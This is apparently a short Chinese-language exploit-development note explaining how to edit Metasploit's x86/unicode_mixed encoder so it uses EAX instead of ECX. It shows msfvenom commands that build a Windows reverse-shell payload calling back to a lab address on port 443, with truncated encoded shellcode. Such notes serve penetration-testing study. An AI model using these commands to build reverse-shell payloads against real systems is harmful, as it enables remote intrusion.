修改msfvenom unicode编码器的默认寄存器

x86/unicode_mixed编码默认使用ECX寄存器生成payload，因此执行到payload时，ECX需要指向payload

┌──(kali㉿kali)-[~]
└─$ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.15.129 LPORT=443 -f python -v payload -e x86/unicode_mixed
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/unicode_mixed
x86/unicode_mixed succeeded with size 774 (iteration=0)
x86/unicode_mixed chosen with final size 774
Payload size: 774 bytes
Final size of python file: 4086 bytes
payload =  b""
payload += b"\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
payload += b"\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
payload += b"\x49\x41\x49\x41\x34\x34\x34\x34\x6a\x58\x41\x51"
payload += b"\x41\x44\x41\x5a\x41\x42\x41\x52\x41\x4c\x41\x59"
payload += b"\x41\x49\x41\x51\x41\x49\x41\x51\x41\x49\x41\x68"
...

定位编码器文件

┌──(kali㉿kali)-[~]
└─$ sudo updatedb
                                                                                                                                                                                                            
┌──(kali㉿kali)-[~]
└─$ locate x86/unicode_mixed
/usr/share/metasploit-framework/modules/encoders/x86/unicode_mixed.rb

将文件中的ECX替换为需要的寄存器，比如EAX

 使用EAX生成payload

┌──(kali㉿kali)-[~]
└─$ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.15.129 LPORT=443 -f python -v payload -e x86/unicode_mixed
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/unicode_mixed
x86/unicode_mixed succeeded with size 774 (iteration=0)
x86/unicode_mixed chosen with final size 774
Payload size: 774 bytes
Final size of python file: 4086 bytes
payload =  b""
payload += b"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41"
payload += b"\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
payload += b"\x49\x41\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51"
payload += b"\x41\x44\x41\x5a\x41\x42\x41\x52\x41\x4c\x41\x59"
payload += b"\x41\x49\x41\x51\x41\x49\x41\x51\x41\x49\x41\x68"
...